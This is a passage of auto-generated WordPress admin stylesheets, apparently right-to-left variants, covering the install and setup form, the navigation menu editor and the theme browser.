.6em;background-color:#fcf0f1}#admin_email,#dbhost,#dbname,#pass1,#pass2,#prefix,#pwd,#uname,#user_login{direction:ltr}.rtl input,.rtl submit,.rtl textarea,body.rtl{font-family:Tahoma,sans-serif}:lang(he-il) .rtl input,:lang(he-il) .rtl submit,:lang(he-il) .rtl textarea,:lang(he-il) body.rtl{font-family:Arial,sans-serif}@media only screen and (max-width:799px){body{margin-top:115px}#logo a{margin:-125px auto 30px}}@media screen and (max-width:782px){.form-table{margin-top:0}.form-table td,.form-table th{display:block;width:auto;vertical-align:middle}.form-table th{padding:20px 0 0}.form-table td{padding:5px 0;border:0;margin:0}input,textarea{font-size:16px}.form-table span.description,.form-table td input[type=email],.form-table td input[type=password],.form-table td input[type=text],.form-table td input[type=url],.form-table td select,.form-table td textarea{width:100%;font-size:16px;line-height:1.5;padding:7px 10px;display:block;max-width:none;box-sizing:border-box}#pwd{padding-right:2.5rem}.wp-pwd #pass1{padding-right:50px}.wp-pwd .button.wp-hide-pw{right:0}#pass-strength-result{width:100%}}body.language-chooser{max-width:300px}.language-chooser select{padding:8px;width:100%;display:block;border:1px solid #dcdcde;background:#fff;color:#2c3338;font-size:16px;font-family:Arial,sans-serif;font-weight:400}.language-chooser select:focus{color:#2c3338}.language-chooser select option:focus,.language-chooser select option:hover{color:var(--wp-admin-theme-color-darker-20)}.language-chooser .step{text-align:right}.screen-reader-input,.screen-reader-text{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}.spinner{background:url(../images/spinner.gif) no-repeat;background-size:20px 20px;visibility:hidden;opacity:.7;width:20px;height:20px;margin:2px 5px 0}.step .spinner{display:inline-block;vertical-align:middle;margin-right:15px}.button.hide-if-no-js,.hide-if-no-js{display:none}@media print,(min-resolution:120dpi){.spinner{background-image:url(../images/spinner-2x.gif)}}/*! This file is auto-generated */ /* nav-menu */ /* @todo: determine if this is truly for nav menus only */ .no-js #message { display: block; } ul.add-menu-item-tabs li { padding: 3px 8px 4px 5px; } .accordion-section ul.category-tabs, .accordion-section ul.add-menu-item-tabs, .accordion-section ul.wp-tab-bar { margin: 0; } .accordion-section .categorychecklist { margin: 13px 0; } #nav-menu-meta .accordion-section-content { padding: 18px 13px; resize: vertical; } #nav-menu-meta .button-controls { margin-bottom: 0; } .has-no-menu-item .button-controls { display: none; } #nav-menus-frame { margin-right: 300px; margin-top: 23px; } #wpbody-content #menu-settings-column { display: inline; width: 281px; margin-right: -300px; clear: both; float: right; padding-top: 0; } #menu-settings-column .inside { clear: both; margin: 10px 0 0; height: 100%; max-height: inherit; } #menu-settings-column .categorydiv, #menu-settings-column .customlinkdiv, #menu-settings-column .posttypediv, #menu-settings-column .taxonomydiv { max-height: inherit; height: 100%; } #menu-settings-column .wp-tab-panel, #menu-settings-column .categorydiv div.tabs-panel, #menu-settings-column .customlinkdiv div.tabs-panel, #menu-settings-column .posttypediv div.tabs-panel, #menu-settings-column .taxonomydiv div.tabs-panel { /* Allow space for content after tab panels in nav menu editor. */ max-height: calc( 100% - 75px ); height: 100%; } .metabox-holder-disabled .postbox, .metabox-holder-disabled .accordion-section-content, .metabox-holder-disabled .accordion-section-title { opacity: 0.5; filter: alpha(opacity=50); } .metabox-holder-disabled .button-controls .select-all { display: none; } #wpbody { position: relative; } .is-submenu { color: #50575e; /* #fafafa background */ font-style: italic; font-weight: 400; margin-right: 4px; } .manage-menus { margin-top: 23px; padding: 10px; overflow: hidden; background: #fff; } .manage-menus .selected-menu, .manage-menus select, .manage-menus .submit-btn, .nav-menus-php .add-new-menu-action { display: inline-block; margin-left: 3px; vertical-align: middle; } .manage-menus select, .menu-location-menus select { max-width: 100%; } .menu-edit #post-body-content h3 { margin: 1em 0 10px; } #nav-menu-bulk-actions-top { margin: 1em 0; } #nav-menu-bulk-actions-bottom { margin: 1em 0; margin: calc( 1em + 9px ) 0; } .bulk-actions input.button { margin-left: 12px; } .bulk-select-button { position: relative; display: inline-block; padding: 0 10px; font-size: 13px; line-height: 2.15384615; height: auto; min-height: 30px; background: #f6f7f7; vertical-align: top; border: 1px solid #dcdcde; margin: 0; cursor: pointer; border-radius: 3px; white-space: nowrap; box-sizing: border-box; } .bulk-selection .bulk-select-button { color: #2271b1; border-color: #2271b1; background: #f6f7f7; vertical-align: top; } #pending-menu-items-to-delete { display: none; } .bulk-selection #pending-menu-items-to-delete { display: block; margin-top: 1em; } #pending-menu-items-to-delete p { margin-bottom: 0; } #pending-menu-items-to-delete ul { margin-top: 0; list-style: none; } #pending-menu-items-to-delete ul li { display: inline; } input.bulk-select-switcher + .bulk-select-button-label { vertical-align: inherit; } label.bulk-select-button:hover, label.bulk-select-button:active, label.bulk-select-button:focus-within { background: #f0f0f1; border-color: #0a4b78; color: #0a4b78; } input.bulk-select-switcher:focus + .bulk-select-button-label { color: #0a4b78; } .bulk-actions input.menu-items-delete { appearance: none; font-size: inherit; border: 0; line-height: 2.1em; background: none; cursor: pointer; text-decoration: underline; color: #b32d2e; } .bulk-actions input.menu-items-delete:hover { color: #b32d2e; border: none; } .bulk-actions input.menu-items-delete.disabled { display: none; } .menu-settings { border-top: 1px solid #f0f0f1; margin-top: 2em; } .menu-settings-group { margin: 0 0 10px; padding-right: 20%; } .menu-settings-group:last-of-type { margin-bottom: 0; } .menu-settings-input { float: right; margin: 0; width: 100%; } .menu-settings-group-name { float: right; clear: both; width: 25%; padding: 3px 0 0; margin-right: -25%; /* 20 container left padding x ( 100 container % width / 80 this % width ) */ } .menu-settings label { vertical-align: baseline; } .menu-edit .checkbox-input { margin-top: 4px; } .theme-location-set { color: #646970; font-size: 11px; } /* Menu Container */ /* @todo: responsive view. */ #menu-management-liquid { float: right; min-width: 100%; margin-top: 3px; } /* @todo: responsive view. */ #menu-management { position: relative; margin-left: 20px; margin-top: -3px; width: 100%; } #menu-management .menu-edit { margin-bottom: 20px; } .nav-menus-php #post-body { padding: 0 10px; border-top: 1px solid #fff; border-bottom: 1px solid #dcdcde; background: #fff; } #nav-menu-header, #nav-menu-footer { padding: 0 10px; background: #f6f7f7; } #nav-menu-header { border-bottom: 1px solid #dcdcde; margin-bottom: 0; } #nav-menu-header .menu-name-label { display: inline-block; vertical-align: middle; margin-left: 7px; } .nav-menus-php #post-body div.updated, .nav-menus-php #post-body div.error { margin: 0; } .nav-menus-php #post-body-content { position: relative; float: none; } .nav-menus-php #post-body-content .post-body-plain { margin-bottom: 0; } #menu-management .menu-add-new abbr { font-weight: 600; } #select-nav-menu-container { text-align: left; padding: 0 10px 3px; margin-bottom: 5px; } #select-nav-menu { width: 100px; display: inline; } #menu-name-label { margin-top: -2px; } .widefat .menu-locations .menu-location-title { padding: 13px 10px 0; } .menu-location-title label { font-weight: 600; } .menu-location-menus select { float: right; } #locations-nav-menu-wrapper { padding: 5px 0; } .locations-nav-menu-select select { float: right; width: 160px; margin-left: 5px; } .locations-row-links { float: right; margin: 6px 6px 0 0; } .locations-edit-menu-link, .locations-add-menu-link { margin: 0 3px; } .locations-edit-menu-link { padding-left: 3px; border-left: 1px solid #c3c4c7; } #menu-management .inside { padding: 0 10px; } /* Add Menu Item Boxes */ .postbox .howto input { width: 180px; float: left; } .accordion-container .outer-border { margin: 0; } .customlinkdiv p { margin-top: 0 } #nav-menu-theme-locations .howto select { width: 100%; } #nav-menu-theme-locations .button-controls { text-align: left; } .add-menu-item-view-all { height: 400px; } /* Button Primary Actions */ #menu-container .submit { margin: 0 0 10px; padding: 0; } /* @todo: is this actually used? */ #cancel-save { text-decoration: underline; font-size: 12px; margin-right: 20px; margin-top: 5px; } .button.right, .button-secondary.right, .button-primary.right { float: left; } /* Button Secondary Actions */ .list-controls { float: right; } .add-to-menu { float: left; } .button-controls { clear: both; margin: 10px 0; } .show-all, .hide-all { cursor: pointer; } .hide-all { display: none; } /* Create Menu */ #menu-name { width: 270px; vertical-align: middle; } #manage-menu .inside { padding: 0; } /* Custom Links */ #available-links dt { display: block; } #add-custom-link .howto { font-size: 12px; } #add-custom-link label span { display: block; float: right; margin-top: 5px; padding-left: 5px; } .menu-item-textbox { width: 180px; } .customlinkdiv .menu-item-textbox { width: 100%; } .nav-menus-php .howto span { float: right; margin-top: 6px; } /* Menu item types */ .quick-search { width: 190px; } .quick-search-wrap .spinner { float: none; margin: -3px 0 0 -10px; } .nav-menus-php .list-wrap { display: none; clear: both; margin-bottom: 10px; } .nav-menus-php .postbox p.submit { margin-bottom: 0; } /* Listings */ .nav-menus-php .list li { display: none; margin: 0 0 5px; } .nav-menus-php .list li .menu-item-title { cursor: pointer; display: block; } .nav-menus-php .list li .menu-item-title input { margin-left: 3px; margin-top: -3px; } .menu-item-title input[type=checkbox] { display: inline-block; margin-top: -4px; } .menu-item-title .post-state { font-weight: 600; } /* Nav Menu */ #menu-container .inside { padding-bottom: 10px; } .menu { padding-top: 1em; } #menu-to-edit { margin: 0; padding: 0.1em 0; } .menu ul { width: 100%; } .menu li { margin-bottom: 0; position: relative; } .menu-item-bar { clear: both; line-height: 1.5; position: relative; margin: 9px 0 0; } .menu-item-bar .menu-item-handle { border: 1px solid #dcdcde; position: relative; padding: 10px 15px; height: auto; min-height: 20px; max-width: 382px; line-height: 2.30769230; overflow: hidden; word-wrap: break-word; } .menu-item-bar .menu-item-handle:hover { border-color: #8c8f94; } #menu-to-edit .menu-item-invalid .menu-item-handle { background: #fcf0f1; border-color: #d63638; } .no-js .menu-item-edit-active .item-edit { display: none; } .js .menu-item-handle { cursor: move; } .menu li.deleting .menu-item-handle { background-image: none; background-color: #f86368; } .menu-item-handle .item-title { font-size: 13px; font-weight: 600; line-height: 1.53846153; display: block; /* @todo: responsive view. */ margin-left: 13em; } .menu-item-handle .menu-item-checkbox { display: none; } .bulk-selection .menu-item-handle .menu-item-checkbox { display: inline-block; margin-left: 6px; } .menu-item-handle .menu-item-title.no-title { color: #646970; } /* Sortables */ li.menu-item.ui-sortable-helper .menu-item-bar { margin-top: 0; } li.menu-item.ui-sortable-helper .menu-item-transport .menu-item-bar { margin-top: 9px; /* Must use the same value used by the dragged item .menu-item-bar */ } .menu .sortable-placeholder { height: 35px; width: 410px; margin-top: 9px; /* Must use the same value used by the dragged item .menu-item-bar */ } /* Hide the transport list when it's empty */ .menu-item .menu-item-transport:empty { display: none; } /* WARNING: The factor of 30px is hardcoded into the nav-menus JavaScript. */ .menu-item-depth-0 { margin-right: 0; } .menu-item-depth-1 { margin-right: 30px; } .menu-item-depth-2 { margin-right: 60px; } .menu-item-depth-3 { margin-right: 90px; } .menu-item-depth-4 { margin-right: 120px; } .menu-item-depth-5 { margin-right: 150px; } .menu-item-depth-6 { margin-right: 180px; } .menu-item-depth-7 { margin-right: 210px; } .menu-item-depth-8 { margin-right: 240px; } .menu-item-depth-9 { margin-right: 270px; } .menu-item-depth-10 { margin-right: 300px; } .menu-item-depth-11 { margin-right: 330px; } .menu-item-depth-0 .menu-item-transport { margin-right: 0; } .menu-item-depth-1 .menu-item-transport { margin-right: -30px; } .menu-item-depth-2 .menu-item-transport { margin-right: -60px; } .menu-item-depth-3 .menu-item-transport { margin-right: -90px; } .menu-item-depth-4 .menu-item-transport { margin-right: -120px; } .menu-item-depth-5 .menu-item-transport { margin-right: -150px; } .menu-item-depth-6 .menu-item-transport { margin-right: -180px; } .menu-item-depth-7 .menu-item-transport { margin-right: -210px; } .menu-item-depth-8 .menu-item-transport { margin-right: -240px; } .menu-item-depth-9 .menu-item-transport { margin-right: -270px; } .menu-item-depth-10 .menu-item-transport { margin-right: -300px; } .menu-item-depth-11 .menu-item-transport { margin-right: -330px; } body.menu-max-depth-0 { min-width: 950px !important; } body.menu-max-depth-1 { min-width: 980px !important; } body.menu-max-depth-2 { min-width: 1010px !important; } body.menu-max-depth-3 { min-width: 1040px !important; } body.menu-max-depth-4 { min-width: 1070px !important; } body.menu-max-depth-5 { min-width: 1100px !important; } body.menu-max-depth-6 { min-width: 1130px !important; } body.menu-max-depth-7 { min-width: 1160px !important; } body.menu-max-depth-8 { min-width: 1190px !important; } body.menu-max-depth-9 { min-width: 1220px !important; } body.menu-max-depth-10 { min-width: 1250px !important; } body.menu-max-depth-11 { min-width: 1280px !important; } /* Menu item controls */ .item-type { display: inline-block; padding: 12px 16px; color: #646970; font-size: 12px; line-height: 1.5; } .item-controls { font-size: 12px; position: absolute; left: 20px; top: -1px; } .item-controls a { text-decoration: none; } .item-controls a:hover { cursor: pointer; } .item-controls .item-order { padding-left: 10px; } .nav-menus-php .item-edit { position: absolute; left: -20px; top: 0; display: block; width: 30px; height: 40px; outline: none; } .no-js.nav-menus-php .item-edit { position: static; float: left; width: auto; height: auto; margin: 12px 0 12px -10px; padding: 0; color: #2271b1; text-decoration: underline; font-size: 12px; line-height: 1.5; } .no-js.nav-menus-php .item-edit .screen-reader-text { position: static; clip-path: none; width: auto; height: auto; margin: 0; } .nav-menus-php .item-edit:before { margin-top: 10px; margin-right: 4px; width: 20px; border-radius: 50%; text-indent: -1px; /* account for the dashicon alignment */ } .no-js.nav-menus-php .item-edit:before { display: none; } .rtl .nav-menus-php .item-edit:before { text-indent: 1px; /* account for the dashicon alignment */ } .js.nav-menus-php .item-edit:focus { box-shadow: none; } .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } /* Menu editing */ .menu-instructions-inactive { display: none; } .menu-item-settings { display: block; max-width: 392px; padding: 10px; position: relative; z-index: 10; /* Keep .item-title's shadow from appearing on top of .menu-item-settings */ border: 1px solid #c3c4c7; border-top: none; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } .menu-item-settings .field-move { margin: 3px 0 5px; line-height: 1.5; } .field-move-visual-label { float: right; margin-left: 4px; } .menu-item-settings .field-move .button-link { display: none; margin: 0 2px; } .menu-item-edit-active .menu-item-settings { display: block; } .menu-item-edit-inactive .menu-item-settings { display: none; } .add-menu-item-pagelinks { margin: .5em -10px; text-align: center; } .add-menu-item-pagelinks .page-numbers { display: inline-block; min-width: 20px; } .add-menu-item-pagelinks .page-numbers.dots { min-width: 0; } .link-to-original { display: block; margin: 0 0 15px; padding: 3px 5px 5px; border: 1px solid #dcdcde; color: #646970; font-size: 12px; } .link-to-original a { padding-right: 4px; font-style: normal; } .hidden-field { display: none; } .description-group { display: flex; column-gap: 10px; } .description-group > * { flex-grow: 1; } .menu-item-actions { padding-top: 15px; padding-bottom: 7px; } #cancel-save { cursor: pointer; } /* Major/minor publishing actions (classes) */ .nav-menus-php .major-publishing-actions { padding: 10px 0; display: flex; align-items: center; } .nav-menus-php .major-publishing-actions > * { margin-left: 10px; } .nav-menus-php .major-publishing-actions .form-invalid { padding-right: 4px; margin-right: -4px; } #nav-menus-frame, #menu-item-url-wrap, #menu-item-name-wrap { display: block; } .button-controls { display: flex; align-items: center; justify-content: space-between; } .button-controls-customlinkdiv { justify-content: flex-end; } /* =Media Queries -------------------------------------------------------------- */ @media only screen and (min-width: 769px) and (max-width: 1000px) { body.menu-max-depth-0 { min-width: 0 !important; } #menu-management-liquid { width: 100%; } .nav-menus-php #post-body-content { min-width: 0; } } @media screen and (max-width: 782px) { body.nav-menus-php, body.wp-customizer { min-width: 0 !important; } #nav-menus-frame { margin-right: 0; float: none; width: 100%; } #wpbody-content #menu-settings-column { display: block; width: 100%; float: none; margin-right: 0; } #side-sortables .add-menu-item-tabs { margin: 15px 0 14px; } ul.add-menu-item-tabs li.tabs { padding: 13px 15px 14px; } .nav-menus-php .customlinkdiv .howto input { width: 65%; } .nav-menus-php .quick-search { width: 85%; } #menu-management-liquid { margin-top: 25px; } .nav-menus-php .menu-name-label.howto span { margin-top: 13px } #menu-name { width: 100%; } .nav-menus-php #nav-menu-header .major-publishing-actions .publishing-action { padding-top: 1em; } .nav-menus-php .delete-action { font-size: 14px; line-height: 2.14285714; } .menu-item-bar .menu-item-handle, .menu-item-settings { width: auto; } .menu-item-settings { padding: 10px; } .menu-item-settings .description-group { display: block; } .menu-item-settings input { width: 100%; } .menu-item-settings input[type="checkbox"], .menu-item-settings input[type="radio"] { width: 25px; } .menu-settings-group { padding-right: 0; overflow: visible; } .menu-settings-group-name { float: none; width: auto; margin-right: 0; margin-bottom: 15px; } .menu-settings-input { float: none; margin-bottom: 15px; } .menu-edit .checkbox-input { margin-top: 0; } .manage-menus select { margin: 0.5em 0; } .wp-core-ui .manage-menus .button { margin-bottom: 0; } .widefat .menu-locations .menu-location-title { padding-top: 16px; } } @media only screen and (min-width: 783px) { @supports (position: sticky) and (scroll-margin-bottom: 130px) { #nav-menu-footer { position: sticky; bottom: 0; z-index: 10; box-shadow: 0 -1px 0 0 #ddd; } #save_menu_header { display: none; } } } @media only screen and (max-width: 768px) { /* menu locations */ #menu-locations-wrap .widefat { width: 100%; } .bulk-select-button { padding: 5px 10px; } } /*! This file is auto-generated */ .themes-php{overflow-y:scroll}.themes-php #adminmenuwrap{z-index:10001}body.js .theme-browser.search-loading{display:none}.theme-browser .themes{clear:both}.themes-php .wrap h1 .button{margin-right:20px}.themes-php .search-form{display:inline-flex;align-items:center;position:relative;top:0;gap:.5rem;width:100%;justify-content:end}.themes-php .wp-filter-search{position:relative;margin:0;width:280px}.theme .notice,.theme .notice.is-dismissible{right:0;margin:0;position:absolute;left:0;top:0}.theme-browser .theme{cursor:pointer;float:right;margin:0 0 4% 4%;position:relative;width:30.6%;background:#fff;border:1px solid rgb(0,0,0,.1);border-radius:8px;box-sizing:border-box;overflow:hidden}.theme-browser .theme:nth-child(3n){margin-left:0}.theme-browser .theme.focus,.theme-browser .theme:hover{cursor:pointer}.theme-browser .theme .theme-name{font-size:15px;font-weight:600;height:18px;margin:0;padding:16px 15px;border-top:1px solid rgb(0,0,0,.1);overflow:hidden;white-space:nowrap;text-overflow:ellipsis;background:#fff}.theme-browser .theme .theme-actions{opacity:0;transition:opacity .1s ease-in-out;height:auto;background:rgba(246,247,247,.7);border-right:1px solid rgba(0,0,0,.05)}.theme-browser .theme.focus .theme-actions,.theme-browser .theme:hover .theme-actions{opacity:1}.theme-browser .theme .theme-actions .button-primary{margin-left:3px}.theme-browser .theme .theme-actions .button,.theme-browser .theme .theme-actions .button.updated-message,.theme-browser .theme .theme-actions .button.updating-message{float:none;margin-right:3px}.theme-browser .theme .theme-actions .button.updated-message::before,.theme-browser .theme .theme-actions .button.updating-message::before{line-height:1;vertical-align:text-bottom;position:relative;top:2px}.theme-browser .theme .theme-actions .button:not(.button-primary){background:#fff}.theme-browser .theme .theme-actions .button:not(.button-primary):hover{background:#f0f0f0}.theme-browser .theme .theme-actions .button:not(.button-primary):focus{background:#fff}.theme-browser .theme .theme-screenshot{display:block;overflow:hidden;position:relative;-webkit-backface-visibility:hidden;transition:opacity .2s ease-in-out}.theme-browser .theme .theme-screenshot:after{content:"";display:block;padding-top:66.66666%}.theme-browser .theme .theme-screenshot img{height:auto;position:absolute;right:0;top:0;width:100%;transition:opacity .2s ease-in-out}.theme-browser .theme.focus .theme-screenshot,.theme-browser .theme:hover .theme-screenshot{background:#fff}.theme-browser.rendered .theme.focus .theme-screenshot img,.theme-browser.rendered .theme:hover .theme-screenshot img{opacity:.4}.theme-browser .theme .more-details{opacity:0;position:absolute;top:35%;left:20%;right:20%;width:60%;background:#1d2327;background:rgba(0,0,0,.7);color:#fff;font-size:15px;text-shadow:0 1px 0 rgba(0,0,0,.6);-webkit-font-smoothing:antialiased;font-weight:600;padding:15px 12px;text-align:center;border-radius:3px;border:none;transition:opacity .1s ease-in-out;cursor:pointer}.theme-browser .theme .more-details:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9)}.theme-browser .theme.focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.theme-browser .theme.focus .more-details{opacity:1}.theme-browser .theme.active.focus .theme-actions{display:block}.theme-browser.rendered .theme.focus .more-details,.theme-browser.rendered .theme:hover .more-details{opacity:1}.theme-browser .theme.active .theme-name{background:#1d2327;color:#fff;padding-left:115px;font-weight:300;box-shadow:inset 0 1px 1px rgba(0,0,0,.5)}.theme-browser .customize-control .theme.active .theme-name{padding-left:15px}.theme-browser .theme.active .theme-name span{font-weight:600}.theme-browser .theme.active .theme-actions{background:0 0;border-right:none;opacity:1}.theme-browser .theme.active .theme-actions .button-primary{border-color:#fff}.theme-id-container{position:relative}.theme-browser .theme .theme-actions,.theme-browser .theme.active .theme-actions{position:absolute;top:50%;transform:translateY(-50%);left:0;padding:9px 12px}.theme-browser .theme:not(.active) .theme-actions{box-shadow:inset 0 1px 0 rgba(0,0,0,.1)}.theme-browser .theme.active .theme-actions .button-primary{margin-left:0}.theme-browser .theme.active .theme-actions .button:not(.button-primary){background:#fff}.theme-browser .theme.active .theme-actions .button:not(.button-primary):hover{background:#f0f0f0}.theme-browser .theme.active .theme-actions .button:not(.button-primary):focus{background:#fff}.theme-browser .theme .theme-author{background:#1d2327;color:#f0f0f1;display:none;font-size:14px;margin:0 10px;padding:5px 10px;position:absolute;bottom:56px}.theme-browser .theme.display-author .theme-author{display:block}.theme-browser .theme.display-author .theme-author a{color:inherit}.theme-browser .theme.add-new-theme{background:0 0;border:none;overflow:visible}.theme-browser .theme.add-new-theme a{text-decoration:none;display:block;position:relative;z-index:1}.theme-browser .theme.add-new-theme a:after{display:block;content:"";background:0 0;background:rgba(0,0,0,0);position:absolute;top:0;right:0;left:0;bottom:0;padding:0;text-shadow:none;border:5px dashed #dcdcde;border:5px dashed rgba(0,0,0,.1);box-sizing:border-box}.theme-browser .theme.add-new-theme span:after{background:#dcdcde;background:rgba(140,143,148,.1);border-radius:50%;display:inline-block;content:"\f132";content:"\f132"/'';-webkit-font-smoothing:antialiased;font:normal 74px/115px dashicons;width:100px;height:100px;vertical-align:middle;text-align:center;color:#8c8f94;position:absolute;top:30%;right:50%;margin-right:-50px;text-indent:-4px;padding:0;text-shadow:none;z-index:4}.rtl .theme-browser .theme.add-new-theme span:after{text-indent:4px}.theme-browser .theme.add-new-theme a:focus .theme-screenshot,.theme-browser .theme.add-new-theme a:hover .theme-screenshot{background:0 0}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{background:#fff;color:#2271b1}.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{border-color:transparent;color:#fff;background:#2271b1;content:""}.theme-browser .theme.add-new-theme .theme-name{background:0 0;border:none;text-align:center;font-weight:400;position:relative;top:0;margin-top:-18px;padding-top:0;padding-bottom:48px}.theme-browser .theme.add-new-theme a:focus .theme-name,.theme-browser .theme.add-new-theme a:hover .theme-name{color:#fff;z-index:2}.theme-overlay .theme-backdrop{position:absolute;right:-20px;left:0;top:0;bottom:0;background:#f0f0f1;background:rgba(240,240,241,.9);z-index:10000;min-height:calc(100vh - var(--wp-admin--admin-bar--height,32px))}.theme-overlay .theme-header{position:absolute;top:0;right:0;left:0;height:48px;border-bottom:1px solid #dcdcde}.theme-overlay .theme-header button{padding:0}.theme-overlay .theme-header .close{cursor:pointer;height:48px;width:50px;text-align:center;float:left;border:0;border-right:1px solid #dcdcde;background-color:transparent;transition:color .1s ease-in-out,background .1s ease-in-out}.theme-overlay .theme-header .close:before{font:normal 22px/50px dashicons!important;color:#787c82;display:inline-block;content:"\f335";content:"\f335"/'';font-weight:300}.theme-overlay .theme-header .left,.theme-overlay .theme-header .right{cursor:pointer;color:#787c82;background-color:transparent;height:48px;width:54px;float:right;text-align:center;border:0;border-left:1px solid #dcdcde;transition:color .1s ease-in-out,background .1s ease-in-out}.theme-overlay .theme-header .close:focus,.theme-overlay .theme-header .close:hover,.theme-overlay .theme-header .left:focus,.theme-overlay .theme-header .left:hover,.theme-overlay .theme-header .right:focus,.theme-overlay .theme-header .right:hover{background:#dcdcde;border-color:#c3c4c7;color:#000}.theme-overlay .theme-header .close:focus:before,.theme-overlay .theme-header .close:hover:before{color:#000}.theme-overlay .theme-header .close:focus,.theme-overlay .theme-header .left:focus,.theme-overlay .theme-header .right:focus{box-shadow:none;outline:0}.theme-overlay .theme-header .left.disabled,.theme-overlay .theme-header .left.disabled:hover,.theme-overlay .theme-header .right.disabled,.theme-overlay .theme-header .right.disabled:hover{color:#c3c4c7;background:inherit;cursor:inherit}.theme-overlay .theme-header .left:before,.theme-overlay .theme-header .right:before{font:normal 20px/50px dashicons!important;display:inline;font-weight:300}.theme-overlay .theme-header .left:before{content:"\f345";content:"\f341"/''}.theme-overlay .theme-header .right:before{content:"\f341";content:"\f345"/''}.theme-overlay .theme-wrap{clear:both;position:fixed;top:9%;right:190px;left:30px;bottom:3%;background:#fff;box-shadow:0 1px 20px 5px rgba(0,0,0,.1);z-index:10000;box-sizing:border-box;-webkit-overflow-scrolling:touch}body.folded .theme-browser~.theme-overlay .theme-wrap{right:70px}.theme-overlay .theme-about{position:absolute;top:49px;bottom:57px;right:0;left:0;overflow:auto;padding:2% 4%}.theme-overlay .theme-actions{position:absolute;text-align:center;bottom:0;right:0;left:0;padding:10px 25px 5px;background:#f6f7f7;z-index:30;box-sizing:border-box;border-top:1px solid #f0f0f1;display:flex;justify-content:center;gap:5px}.theme-overlay .theme-actions .button{margin-bottom:5px}.customize-support .theme-overlay .theme-actions a[href="themes.php?page=custom-background"],.customize-support .theme-overlay .theme-actions a[href="themes.php?page=custom-header"]{display:none}.broken-themes a.delete-theme,.theme-overlay .theme-actions .delete-theme{color:#b32d2e;text-decoration:none;border-color:transparent;box-shadow:none;background:0 0}.broken-themes a.delete-theme:focus,.broken-themes a.delete-theme:hover,.theme-overlay .theme-actions .delete-theme:focus,.theme-overlay .theme-actions .delete-theme:hover{background:#b32d2e;color:#fff;border-color:#b32d2e;box-shadow:0 0 0 1px #b32d2e}.theme-overlay .theme-actions .active-theme,.theme-overlay.active .theme-actions .inactive-theme{display:none}.theme-overlay .theme-actions .inactive-theme,.theme-overlay.active .theme-actions .active-theme{display:block}.theme-overlay .theme-screenshots{float:right;margin:0 0 0 30px;width:55%;max-width:1200px;text-align:center}.theme-overlay .screenshot{border:1px solid #fff;box-sizing:border-box;overflow:hidden;position:relative;box-shadow:0 0 0 1px rgba(0,0,0,.2)}.theme-overlay .screenshot:after{content:"";display:block;padding-top:75%}.theme-overlay .screenshot img{height:auto;position:absolute;right:0;top:0;width:100%}.theme-overlay.small-screenshot .theme-screenshots{position:absolute;width:302px}.theme-overlay.small-screenshot .theme-info{margin-right:350px;width:auto}.theme-overlay .screenshot.thumb{background:#c3c4c7;border:1px solid #f0f0f1;float:none;display:inline-block;margin:10px 5px 0;width:140px;height:80px;cursor:pointer}.theme-overlay .screenshot.thumb:after{content:"";display:block;padding-top:100%}.theme-overlay .screenshot.thumb img{cursor:pointer;height:auto;position:absolute;right:0;top:0;width:100%;height:auto}.theme-overlay .screenshot.selected{background:0 0;border:2px solid #72aee6}.theme-overlay .screenshot.selected img{opacity:.8}.theme-browser .theme .theme-screenshot.blank,.theme-overlay .screenshot.blank{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAALElEQVQYGWO8d+/efwYkoKioiMRjYGBC4WHhUK6A8T8QIJt8//59ZC493AAAQssKpBK4F5AAAAAASUVORK5CYII=)}.theme-overlay .theme-info{width:40%;float:right}.theme-overlay .current-label{background:#2c3338;color:#fff;font-size:11px;display:inline-block;padding:2px 8px;border-radius:2px;margin:0 0 -10px;-webkit-user-select:none;user-select:none}.theme-overlay .theme-name{color:#1d2327;font-size:32px;font-weight:100;margin:10px 0 0;line-height:1.3;word-wrap:break-word;overflow-wrap:break-word}.theme-overlay .theme-version{color:#646970;font-size:13px;font-weight:400;float:none;display:inline-block;margin-right:10px}.theme-overlay .theme-author{margin:15px 0 25px;color:#646970;font-size:16px;font-weight:400;line-height:inherit}.theme-overlay .toggle-auto-update{display:inline-flex;align-items:center;min-height:20px;vertical-align:top}.theme-overlay .theme-autoupdate .toggle-auto-update{text-decoration:none}.theme-overlay .theme-autoupdate .toggle-auto-update .label{text-decoration:underline}.theme-overlay .theme-description{color:#50575e;font-size:15px;font-weight:400;line-height:1.5;margin:30px 0 0}.theme-overlay .theme-tags{border-top:3px solid #f0f0f1;color:#646970;font-size:13px;font-weight:400;margin:30px 0 0;padding-top:20px}.theme-overlay .theme-tags span{color:#3c434a;font-weight:600;margin-left:5px}.theme-overlay .parent-theme{background:#fff;border:1px solid #f0f0f1;border-right:4px solid #72aee6;font-size:14px;font-weight:400;margin-top:30px;padding:10px 20px 10px 10px}.theme-overlay .parent-theme strong{font-weight:600}.single-theme .theme,.single-theme .theme-overlay .theme-backdrop,.single-theme .theme-overlay .theme-header{display:none}.single-theme .theme-overlay .theme-wrap{clear:both;min-height:330px;position:relative;right:auto;left:auto;top:auto;bottom:auto;z-index:10}.single-theme .theme-overlay .theme-about{padding:30px 30px 70px;position:static}.single-theme .theme-overlay .theme-actions{position:absolute}@media only screen and (min-width:2000px){#wpwrap .theme-browser .theme{width:17.6%;margin:0 0 3% 3%}#wpwrap .theme-browser .theme:nth-child(3n),#wpwrap .theme-browser .theme:nth-child(4n){margin-left:3%}#wpwrap .theme-browser .theme:nth-child(5n){margin-left:0}}@media only screen and (min-width:1680px){.theme-overlay .theme-wrap{width:1450px;margin:0 auto}}@media only screen and (min-width:1640px){.theme-browser .theme{width:22.7%;margin:0 0 3% 3%}.theme-browser .theme .theme-screenshot:after{padding-top:75%}.theme-browser .theme:nth-child(3n){margin-left:3%}.theme-browser 